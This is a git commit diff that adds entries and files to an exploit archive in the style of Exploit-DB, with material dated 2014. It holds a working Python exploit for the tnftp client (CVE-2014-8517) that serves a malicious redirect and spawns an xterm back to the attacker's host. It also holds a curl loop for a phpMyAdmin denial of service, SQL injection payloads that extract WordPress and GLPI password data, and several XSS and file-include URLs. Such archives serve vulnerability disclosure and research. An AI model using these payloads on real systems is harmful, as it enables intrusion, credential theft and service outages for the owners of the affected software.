Updated 12_16_2014
This commit is contained in:
parent
8da471b3fa
commit
b4ae4f9045
21 changed files with 1587 additions and 1 deletions
22
files.csv
22
files.csv
|
@ -31292,7 +31292,7 @@ id,file,description,date,author,platform,type,port
|
|||
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
|
||||
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
|
||||
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
|
||||
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
|
||||
34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
|
||||
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
|
||||
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
|
||||
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
|
||||
|
@ -31912,6 +31912,7 @@ id,file,description,date,author,platform,type,port
|
|||
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
|
||||
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
|
||||
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
|
||||
35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
|
||||
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
|
||||
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
|
||||
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
|
||||
|
@ -31980,6 +31981,7 @@ id,file,description,date,author,platform,type,port
|
|||
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
|
||||
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
|
||||
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
|
||||
35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0
|
||||
35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
|
||||
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
|
||||
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
|
||||
|
@ -31992,3 +31994,21 @@ id,file,description,date,author,platform,type,port
|
|||
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
|
||||
35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
|
||||
35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
|
||||
35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0
|
||||
35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
|
||||
35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0
|
||||
35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0
|
||||
35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0
|
||||
35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0
|
||||
35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
|
||||
35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
|
||||
35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
|
||||
35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
|
||||
35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
|
||||
35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
|
||||
35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
|
||||
35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
|
||||
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
|
||||
35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
|
||||
35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
|
||||
35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
148
platforms/bsd/remote/35427.py
Executable file
148
platforms/bsd/remote/35427.py
Executable file
|
@ -0,0 +1,148 @@
|
|||
#!/usr/bin/env python2
|
||||
#
|
||||
# Exploit Title: [tnftp BSD exploit]
|
||||
# Date: [11/29/2014]
|
||||
# Exploit Author: [dash]
|
||||
# Vendor Homepage: [www.freebsd.org]
|
||||
# Version: [FreeBSD 8/9/10]
|
||||
# Tested on: [FreeBSD 9.3]
|
||||
# CVE : [CVE-2014-8517]
|
||||
|
||||
# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
|
||||
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
|
||||
#
|
||||
# 29 Nov 2014 by dash@hack4.org
|
||||
#
|
||||
# usage:
|
||||
#
|
||||
# redirect the vulnerable ftp client requests for http to your machine
|
||||
#
|
||||
# client will do something like:
|
||||
# ftp http://ftp.freebsd.org/data.txt
|
||||
#
|
||||
# you will intercept the dns request and redirect victim to your fake webserver ip
|
||||
#
|
||||
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
|
||||
# probably do also xhost+victimip
|
||||
#
|
||||
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
|
||||
#
|
||||
# sadly you cannot put a slash behind the | also www-encoded is not working
|
||||
# plus problems with extra pipes
|
||||
# this renders a lot of usefull commands useless
|
||||
# so xterm -display it was ;)
|
||||
#
|
||||
# *dirty* *dirdy* *dyrdy* *shell* !
|
||||
#
|
||||
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
import socket
|
||||
|
||||
|
||||
def usage():
|
||||
print "CVE-2014-8517 tnftp exploit"
|
||||
print "by dash@hack4.org in 29 Nov 2014"
|
||||
print
|
||||
print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
|
||||
print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
|
||||
|
||||
#bind a fake webserver on 0.0.0.0 port 80
|
||||
def webserveRedirect(redirect):
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
s.bind(("0.0.0.0",80))
|
||||
s.listen(3)
|
||||
h, c = s.accept()
|
||||
|
||||
#wait for request
|
||||
#print h.recv(1024)
|
||||
|
||||
#send 302
|
||||
print "[+] Sending redirect :>"
|
||||
h.send(redirect)
|
||||
s.close()
|
||||
return 0
|
||||
|
||||
#bind a fake webserver on port %rport
|
||||
def deliverUgga(owned):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
s.bind(("0.0.0.0",rport))
|
||||
s.listen(3)
|
||||
h, c = s.accept()
|
||||
|
||||
# print h.recv(1024)
|
||||
print "[+] Deliver some content (shell is spwaned now)"
|
||||
h.send(owned)
|
||||
s.close()
|
||||
|
||||
return 0
|
||||
|
||||
owned="""HTTP/1.1 200 Found
|
||||
Date: Fri, 29 Nov 2014 1:00:03 GMT
|
||||
Server: Apache
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 5
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=iso-8859-1
|
||||
|
||||
|
||||
ugga ugga
|
||||
"""
|
||||
|
||||
if(os.getuid())!=0:
|
||||
print "[-] Sorry, you need root to bind port 80!"
|
||||
sys.exit(1)
|
||||
|
||||
if len(sys.argv)<3:
|
||||
usage()
|
||||
sys.exit(1)
|
||||
|
||||
rip = sys.argv[1]
|
||||
rport = int(sys.argv[2])
|
||||
revip = sys.argv[3]
|
||||
|
||||
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
|
||||
print "[+] Dont forget to run Xnest -ac :1"
|
||||
|
||||
# ok, lets use xterm -display
|
||||
cmd = "xterm -display %s:1" % (revip)
|
||||
cmd = cmd.replace(" ","%20")
|
||||
|
||||
print "[+] Payload: [%s]" % cmd
|
||||
|
||||
redirect = "HTTP/1.1 302\r\n"\
|
||||
"Content-Type: text/html\r\n"\
|
||||
"Connection: keep-alive\r\n"\
|
||||
"Location: http://%s:%d/cgi-bin/|%s\r\n"\
|
||||
"\r\n\r\n" % (rip,rport,cmd)
|
||||
|
||||
#child process owned data delivery
|
||||
uggapid = os.fork()
|
||||
if uggapid == 0:
|
||||
uggapid = os.getpid()
|
||||
deliverUgga(owned)
|
||||
else:
|
||||
#child proces for webserver redirect
|
||||
webpid = os.fork()
|
||||
if webpid == 0:
|
||||
webpid = os.getpid()
|
||||
webserveRedirect(redirect)
|
||||
|
||||
|
||||
|
||||
#childs, come home!
|
||||
try:
|
||||
os.waitpid(webpid,0)
|
||||
except:
|
||||
pass
|
||||
try:
|
||||
os.waitpid(uggapid,0)
|
||||
except:
|
||||
pass
|
||||
|
||||
#oh wait :>
|
||||
time.sleep(5)
|
42
platforms/php/dos/35539.txt
Executable file
42
platforms/php/dos/35539.txt
Executable file
|
@ -0,0 +1,42 @@
|
|||
=============
|
||||
DESCRIPTION:
|
||||
=============
|
||||
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
|
||||
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
|
||||
cause a denial of service (resource consumption) via a long password.
|
||||
CVE-2014-9218 was assigned
|
||||
|
||||
=============
|
||||
Time Line:
|
||||
=============
|
||||
December 3, 2014 - A phpMyAdmin update and the security advisory is
|
||||
published.
|
||||
|
||||
=============
|
||||
Proof of Concept:
|
||||
=============
|
||||
|
||||
*1 - Create the payload.*
|
||||
|
||||
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
|
||||
{1..1000000} >> payload
|
||||
|
||||
*2 - Performing the Denial of Service attack.*
|
||||
|
||||
$ for i in `seq 1 150`; do (curl --data @payload
|
||||
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
|
||||
|
||||
=============
|
||||
Authors:
|
||||
=============
|
||||
|
||||
-- Javer Nieto -- http://www.behindthefirewalls.com
|
||||
-- Andres Rojas -- http://www.devconsole.info
|
||||
=============
|
||||
|
||||
References:
|
||||
====================================================================
|
||||
|
||||
*
|
||||
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
|
||||
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php
|
35
platforms/php/webapps/35505.txt
Executable file
35
platforms/php/webapps/35505.txt
Executable file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: WP Symposium 14.10 SQL Injection
|
||||
# Date: 22-10-2014
|
||||
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
|
||||
# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
|
||||
# Category: webapps
|
||||
# CVE: CVE-2014-8810
|
||||
|
||||
1. Description
|
||||
|
||||
$_POST['tray'] is not escaped.
|
||||
|
||||
File: wp-symposium\ajax\mail_functions.php
|
||||
$tray = $_POST['tray'];
|
||||
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
|
||||
|
||||
http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
|
||||
|
||||
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
|
||||
<input type="hidden" name="action" value="getMailMessage">
|
||||
Message ID: <input type="text" name="mid"><br />
|
||||
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
|
||||
<input type="submit" value="Inject">
|
||||
</form>
|
||||
|
||||
Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
|
||||
|
||||
3. Solution:
|
||||
|
||||
Update to version 14.11
|
||||
http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
|
||||
https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
|
9
platforms/php/webapps/35520.txt
Executable file
9
platforms/php/webapps/35520.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47073/info
|
||||
|
||||
Claroline is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Claroline 1.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
"><script>alert(0)</script>
|
19
platforms/php/webapps/35521.txt
Executable file
19
platforms/php/webapps/35521.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/47074/info
|
||||
|
||||
osCSS is prone to a cross-site scripting vulnerability and multiple local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
|
||||
|
||||
osCSS 2.1.0 RC12 is vulnerable; other versions may also be affected.
|
||||
|
||||
|
||||
Cross-site scripting:
|
||||
|
||||
http://www.example.com/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//
|
||||
|
||||
|
||||
Local file include:
|
||||
|
||||
http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
||||
|
||||
http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
10
platforms/php/webapps/35522.txt
Executable file
10
platforms/php/webapps/35522.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/47077/info
|
||||
|
||||
Spitfire is prone to a cross-site scripting vulnerability. because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
[code]
|
||||
GET / HTTP/1.1
|
||||
Cookie: cms_username=admin">[xss]<
|
||||
[/code]
|
9
platforms/php/webapps/35523.txt
Executable file
9
platforms/php/webapps/35523.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47078/info
|
||||
|
||||
Tracks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Tracks 1.7.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://example.com/todos/tag/'"--></style></script><script>alert(0x000238)</script>
|
7
platforms/php/webapps/35524.txt
Executable file
7
platforms/php/webapps/35524.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/47085/info
|
||||
|
||||
XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script>
|
11
platforms/php/webapps/35525.txt
Executable file
11
platforms/php/webapps/35525.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/47086/info
|
||||
|
||||
GuppY is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
GuppY 4.6.14 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/links.php?lng=fr [sql Injection]
|
||||
http://www.example.com/guestbk.php?lng=fr [sql Injection]
|
||||
http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection]
|
96
platforms/php/webapps/35526.txt
Executable file
96
platforms/php/webapps/35526.txt
Executable file
|
@ -0,0 +1,96 @@
|
|||
source: http://www.securityfocus.com/bid/47089/info
|
||||
|
||||
YaCOMAS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
YaCOMAS 0.3.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
===================================================================
|
||||
YaCOMAS 0.3.6 Multiple vulnerability
|
||||
===================================================================
|
||||
|
||||
Software: Yacomas 0.3.6
|
||||
Vendor: http://yacomas.sourceforge.net/
|
||||
Vuln Type: Multiple Vulnerability
|
||||
Download link: http://patux.net/downloads/yacomas-0.3.6_alpha.tar.gz
|
||||
Author: Pr@fesOr X
|
||||
contact: profesor_x(at)otmail.com
|
||||
Home: www.ccat.edu.mx
|
||||
Company: Centro de Investigaciones en Alta Tecnologia
|
||||
|
||||
|
||||
|
||||
=========================
|
||||
--Description XSS --
|
||||
=========================
|
||||
|
||||
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
|
||||
|
||||
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
|
||||
|
||||
===============================
|
||||
--= Attack details No. 1 =--
|
||||
===============================
|
||||
|
||||
This vulnerability affects /yacomas/asistente/index.php.
|
||||
|
||||
|
||||
http://www.site.com/yacomas/asistente/index.php?opc=1
|
||||
|
||||
|
||||
--URL encoded POST input S_apellidos was set to " onmouseover=prompt(11111111111) bad="
|
||||
|
||||
|
||||
--The input is reflected inside a tag element between double quotes.
|
||||
|
||||
|
||||
--details: can you inyect this in the HTTP headers whit this data:
|
||||
|
||||
-----------------------
|
||||
C_sexo=M&I_b_day=0&I_b_month=0&I_b_year=0&I_id_estado=0&I_id_estudios=0&I_id_tasistente=0&S_apellidos=%22%20onmouseover%3dprompt%2811111111111%29%20bad%3d%22&S_ciudad=&S_login=oijclpgk&S_mail=hola@ccat.edu.mx.tst&S_nombrep=oijclpgk&S_org=&S_passwd=rodolfo&S_passwd2=rodolfo&submit=Registrarme
|
||||
------------------------
|
||||
|
||||
|
||||
===============================
|
||||
--= Vulnerable forms and variables =--
|
||||
===============================
|
||||
|
||||
S_apellidos
|
||||
s_ciudad
|
||||
s_login
|
||||
s_mail
|
||||
s_nombrep
|
||||
s_org
|
||||
|
||||
|
||||
===============================
|
||||
--= Attack XSS details No. 2 =--
|
||||
===============================
|
||||
|
||||
http://www.site.com/yacomas/admin/index.php
|
||||
|
||||
|
||||
--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
|
||||
|
||||
------------------------------------------
|
||||
|
||||
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
|
||||
|
||||
-------------------------------------------------------------------
|
||||
|
||||
|
||||
==========================================
|
||||
--= Attack XSS remote code execution No. 2 =--
|
||||
==========================================
|
||||
|
||||
http://www.site.com/yacomas/admin/index.php
|
||||
|
||||
|
||||
--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
|
||||
|
||||
------------------------------------------
|
||||
|
||||
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
|
||||
|
||||
-------------------------------------------------------------------
|
40
platforms/php/webapps/35528.txt
Executable file
40
platforms/php/webapps/35528.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: GLPI 0.85 Blind SQL Injection
|
||||
# Date: 28-11-2014
|
||||
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
|
||||
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
|
||||
# CVE: CVE-2014-9258
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
$_GET['condition'] is not escaped correctly.
|
||||
|
||||
File: ajax\getDropdownValue.php
|
||||
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
|
||||
$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
|
||||
}
|
||||
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
|
||||
$where .= " AND ".$_GET['condition']." ";
|
||||
}
|
||||
$query = "SELECT `$table`.* $addselect
|
||||
FROM `$table`
|
||||
$addjoin
|
||||
$where
|
||||
ORDER BY $add_order `$table`.`completename`
|
||||
$LIMIT";
|
||||
|
||||
if ($result = $DB->query($query)) {
|
||||
|
||||
}
|
||||
|
||||
http://security.szurek.pl/glpi-085-blind-sql-injection.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
|
||||
|
||||
3. Solution:
|
||||
|
||||
Update to version 0.85.1
|
||||
http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
|
||||
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz
|
655
platforms/php/webapps/35541.txt
Executable file
655
platforms/php/webapps/35541.txt
Executable file
|
@ -0,0 +1,655 @@
|
|||
?Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
|
||||
Injection Vulnerabilities
|
||||
|
||||
Author: Adler Freiheit
|
||||
Discovered: 11 June 2014
|
||||
Updated: 11 December 2014
|
||||
Published: 11 December 2014
|
||||
Vendor: Montala Limited
|
||||
Vendor url: www.resourcespace.org
|
||||
Software: ResourceSpace Digital Asset Management Software
|
||||
Versions: 6.4.5976 and prior
|
||||
Status: Unpatched
|
||||
Vulnerable scripts:
|
||||
/pages/themes.php
|
||||
/pages/preview.php
|
||||
/pages/help.php
|
||||
/pages/search.php
|
||||
/pages/user_password.php
|
||||
/pages/user_request.php
|
||||
(and probably others)
|
||||
|
||||
Description:
|
||||
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
|
||||
injection attacks, and insecure cookie handling. The scripts fail to
|
||||
properly sanitize user-supplied input, check the network protocol used
|
||||
to access the site.
|
||||
|
||||
Vulnerability: SC1414
|
||||
Name: Cross Site Scripting (XSS)
|
||||
Type: Application
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 6 Oct 2014
|
||||
Service: tcp/https:443
|
||||
Severity: 4
|
||||
Risk: 40
|
||||
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
|
||||
Resolution Effort: 3
|
||||
|
||||
Description:
|
||||
This web application is vulnerable to Cross Site Scripting (XSS).
|
||||
XSS is caused when an application echoes user controllable input data
|
||||
back to the browser without first sanitising or escaping dangerous
|
||||
characters. Unescaped strings are then interpreted or executed by the
|
||||
browser as script, just as if they had originated from the web server.
|
||||
Malicious script is sent by the attacker via the vulnerable web
|
||||
application and executed on the victims browser, within the context of
|
||||
that user and may be used to steal session information, redirect users
|
||||
to a malicious site, and even steal credentials in a Phishing attack.
|
||||
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
|
||||
http://cwe.mitre.org/data/definitions/79.html
|
||||
|
||||
Solution:
|
||||
Validate all user controllable input data (hidden fields, URL
|
||||
parameters, Cookie values, HTTP headers etc) against expected Type,
|
||||
Length and where possible, Format and Range characteristics. Reject
|
||||
any data that fails validation.
|
||||
Sanitise all user controllable input data (hidden fields, URL
|
||||
parameters, Cookie values, HTTP headers etc) by converting potentially
|
||||
dangerous characters (listed below) into HTML entities such as > < etc
|
||||
using output encoding.
|
||||
By combining proper input validation with effective input sanitisation
|
||||
and output encoding, Cross Site Scripting vulnerabilities will be
|
||||
mitigated.
|
||||
[1] <> (triangular parenthesis)
|
||||
[2] " (quotation mark)
|
||||
[3] ' (single apostrophe)
|
||||
[4] % (percent sign)
|
||||
[5] ; (semicolon)
|
||||
[6] () (parenthesis)
|
||||
[7] & (ampersand sign)
|
||||
[8] + (plus sign)
|
||||
[9] / (forward slash)
|
||||
[10] | (pipe)
|
||||
[11] [] (square brackets)
|
||||
[12] : (colon)
|
||||
|
||||
Information
|
||||
URI: /pages/preview.php
|
||||
Parameter: sort (GET)
|
||||
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>
|
||||
|
||||
Vulnerability: 44967
|
||||
Name: CGI Generic Command Execution (timebased)
|
||||
Type: CGI abuses
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 4
|
||||
Risk: 40
|
||||
CVSS Base Score: 7.5
|
||||
|
||||
Description:
|
||||
The remote web server hosts CGI scripts that fail to adequately
|
||||
sanitize request strings. By leveraging this issue, an attacker may be
|
||||
able to execute arbitrary commands on the remote host.
|
||||
Note that this script uses a timebased detection method which is less
|
||||
reliable than the basic method.
|
||||
|
||||
